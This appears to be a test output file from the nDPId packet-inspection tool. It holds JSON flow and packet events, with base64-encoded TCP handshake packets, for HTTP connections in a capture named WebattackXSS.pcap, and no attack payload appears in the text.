+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3128,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":221,"flow_packet_id":2,"flow_last_seen":1499347343672,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347343672,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ23pctqnYQuGL8KAScSAp8gAAAgQFtAQCCAoD5CiPATpXGQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":221,"flow_packet_id":3,"flow_last_seen":1499347343673,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347343673,"pkt":"ABm5CmnxAMGxFOsxCABFAAA03PdAAD4G6OCsEAABwKgKMtt6AFBC4YvwXLap2YAQAOXI+AAAAQEICgE6VxoD5CiP"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3136,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347210270,"flow_last_seen":1499347215675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347343711,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54768,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3136,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347210270,"flow_last_seen":1499347215675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347343711,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54768,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3136,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347211522,"flow_last_seen":1499347216676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347343711,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54782,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3136,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347211522,"flow_last_seen":1499347216676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347343711,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54782,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3136,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347214088,"flow_last_seen":1499347219676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347343711,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54808,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3136,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347214088,"flow_last_seen":1499347219676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347343711,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54808,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3136,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347215361,"flow_last_seen":1499347220676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347343711,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54822,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3136,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347215361,"flow_last_seen":1499347220676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347343711,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54822,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3136,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347216659,"flow_last_seen":1499347221677,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347343711,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54836,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3136,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347216659,"flow_last_seen":1499347221677,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347343711,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54836,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3149,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347346211,"flow_last_seen":1499347346211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347346211,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56212,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3149,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":222,"flow_packet_id":1,"flow_last_seen":1499347346211,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347346211,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ZYhAAD4GYEisEAABwKgKMtuUAFCjBDwcAAAAAKACchBJMAAAAgQFtAQCCAoBOlmUAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3150,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":222,"flow_packet_id":2,"flow_last_seen":1499347346211,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347346211,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ25SXkk2howQ8HaAScSA17QAAAgQFtAQCCAoD5CsKATpZlAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3151,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":222,"flow_packet_id":3,"flow_last_seen":1499347346211,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347346211,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ZYlAAD4GYE+sEAABwKgKMtuUAFCjBDwdl5JNooAQAOXU9AAAAQEICgE6WZQD5CsK"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3160,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347347483,"flow_last_seen":1499347347483,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347347483,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56226,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3160,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":223,"flow_packet_id":1,"flow_last_seen":1499347347483,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347347483,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8D8lAAD4GtgesEAABwKgKMtuiAFCZ3FUbAAAAAKACchA4DQAAAgQFtAQCCAoBOlrSAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3161,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":223,"flow_packet_id":2,"flow_last_seen":1499347347483,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347347483,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ26Ji05dMmdxVHKAScSAOoAAAAgQFtAQCCAoD5CxIATpa0gEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3162,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":223,"flow_packet_id":3,"flow_last_seen":1499347347484,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347347484,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0D8pAAD4Gtg6sEAABwKgKMtuiAFCZ3FUcYtOXTYAQAOWtpwAAAQEICgE6WtID5CxI"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3176,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347348776,"flow_last_seen":1499347348776,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347348776,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56240,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3176,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":224,"flow_packet_id":1,"flow_last_seen":1499347348776,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347348776,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8P2lAAD4GhmesEAABwKgKMtuwAFBd3mN8AAAAAKACchBkWQAAAgQFtAQCCAoBOlwVAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3177,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":224,"flow_packet_id":2,"flow_last_seen":1499347348776,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347348776,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ27AjVjRJXd5jfaAScSDcKQAAAgQFtAQCCAoD5C2LATpcFQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3178,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":224,"flow_packet_id":3,"flow_last_seen":1499347348777,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347348777,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0P2pAAD4Ghm6sEAABwKgKMtuwAFBd3mN9I1Y0SoAQAOV7MAAAAQEICgE6XBYD5C2L"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3190,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347351299,"flow_last_seen":1499347351299,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347351299,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56266,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3190,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":225,"flow_packet_id":1,"flow_last_seen":1499347351299,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347351299,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8XeBAAD4GZ\/CsEAABwKgKMtvKAFA3cANsAAAAAKACchDoRgAAAgQFtAQCCAoBOl6MAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3191,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":225,"flow_packet_id":2,"flow_last_seen":1499347351299,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347351299,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ28rLt8HDN3ADbaAScSAnxAAAAgQFtAQCCAoD5DACATpejAEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3192,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":225,"flow_packet_id":3,"flow_last_seen":1499347351300,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347351300,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0XeFAAD4GZ\/esEAABwKgKMtvKAFA3cANty7fBxIAQAOXGywAAAQEICgE6XowD5DAC"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3202,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347352698,"flow_last_seen":1499347352698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347352698,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56280,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3202,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":226,"flow_packet_id":1,"flow_last_seen":1499347352698,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347352698,"pkt":"ABm5CmnxAMGxFOsxCABFAAA894dAAD4GzkisEAABwKgKMtvYAFB9d6htAAAAAKACchD70QAAAgQFtAQCCAoBOl\/qAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3203,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":226,"flow_packet_id":2,"flow_last_seen":1499347352699,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347352699,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ29gsQT\/ffXeobqAScSBbTAAAAgQFtAQCCAoD5DFgATpf6gEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3204,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":226,"flow_packet_id":3,"flow_last_seen":1499347352699,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347352699,"pkt":"ABm5CmnxAMGxFOsxCABFAAA094hAAD4Gzk+sEAABwKgKMtvYAFB9d6huLEE\/4IAQAOX6UwAAAQEICgE6X+oD5DFg"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347219208,"flow_last_seen":1499347224678,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347353987,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54862,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347219208,"flow_last_seen":1499347224678,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347353987,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54862,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347220447,"flow_last_seen":1499347225677,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347353987,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54876,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347220447,"flow_last_seen":1499347225677,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347353987,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54876,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347221694,"flow_last_seen":1499347227677,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347353987,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54890,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347221694,"flow_last_seen":1499347227677,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347353987,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54890,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347224338,"flow_last_seen":1499347229678,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347353987,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54916,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347224338,"flow_last_seen":1499347229678,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347353987,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54916,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347225590,"flow_last_seen":1499347230679,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347353987,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54930,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347225590,"flow_last_seen":1499347230679,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347353987,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54930,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"finished","flow_packets_processed":310,"flow_first_seen":1499347163177,"flow_last_seen":1499347230695,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232658,"flow_avg_l4_payload_len":750,"midstream":0,"thread_ts_msec":1499347353987,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54268,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3223,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347355229,"flow_last_seen":1499347355229,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347355229,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56306,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3223,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":227,"flow_packet_id":1,"flow_last_seen":1499347355229,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347355229,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8GHxAAD4GrVSsEAABwKgKMtvyAFB7gnofAAAAAKACchApggAAAgQFtAQCCAoBOmJjAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3224,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":227,"flow_packet_id":2,"flow_last_seen":1499347355229,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347355229,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2\/L7jmGSe4J6IKAScSCVgwAAAgQFtAQCCAoD5DPYATpiYwEDAwc="} 